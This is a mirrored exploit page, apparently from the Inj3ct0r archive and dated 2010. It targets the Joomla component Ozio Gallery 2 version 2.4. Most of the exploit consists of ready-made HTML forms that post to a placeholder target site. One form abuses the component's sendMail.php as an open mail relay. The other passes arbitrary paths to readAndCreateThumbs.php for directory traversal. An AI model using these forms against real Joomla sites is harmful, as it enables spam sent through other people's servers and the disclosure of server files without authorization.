Home / os / win7

Joomla Component com_oziogallery2 Multiple Vulnerabilities

Posted on 18 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_oziogallery2 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================================
Joomla Component com_oziogallery2 Multiple Vulnerabilities
==========================================================


&lt;!--
# Exploit Title: Joomla Component Ozio Gallery 2 Multiple Vulnerabilities
# Date: 28 May 2010
# Author: jdc
# Software Link:
http://extensions.joomla.org/extensions/photos-a-images/photo-flash-gallery/4883
# Version: 2.4
# Tested on: PHP5, MySQL5
--&gt;
 
&lt;h2&gt;Ozio Gallery 2&lt;/h2&gt;
&lt;h3&gt;v 2.4&lt;/h3&gt;
 
&lt;h4&gt;Open Mail Relay:&lt;/h4&gt;
 
&lt;form method=&quot;post&quot;
action=&quot;http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/sendMail.php&quot;&gt;
&lt;label for=&quot;to&quot;&gt;To:&lt;/label&gt;&lt;input id=&quot;to&quot; name=&quot;to&quot; type=&quot;text&quot; /&gt;&lt;br /&gt;
&lt;label for=&quot;from&quot;&gt;From:&lt;/label&gt;&lt;input id=&quot;from&quot; name=&quot;from&quot; type=&quot;text&quot;
/&gt;&lt;br /&gt;
&lt;label for=&quot;subject&quot;&gt;Subject:&lt;/label&gt;&lt;input id=&quot;subject&quot; name=&quot;subject&quot;
type=&quot;text&quot; /&gt;&lt;br /&gt;
&lt;label for=&quot;message&quot;&gt;Message:&lt;/label&gt;&lt;textarea id=&quot;message&quot;
name=&quot;message&quot;&gt;&lt;/textarea&gt;&lt;br /&gt;
&lt;input type=&quot;submit&quot; value=&quot;Send&quot;/&gt;
&lt;/form&gt;
 
 
&lt;h4&gt;Directory Traversal:&lt;/h4&gt;
 
&lt;form method=&quot;post&quot;
action=&quot;http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs.php&quot;&gt;
&lt;label for=&quot;path&quot;&gt;path:&lt;/label&gt;&lt;input id=&quot;path&quot; name=&quot;path&quot; type=&quot;text&quot;
/&gt;&lt;br /&gt;
&lt;input type=&quot;submit&quot; value=&quot;Send&quot;/&gt;
&lt;/form&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :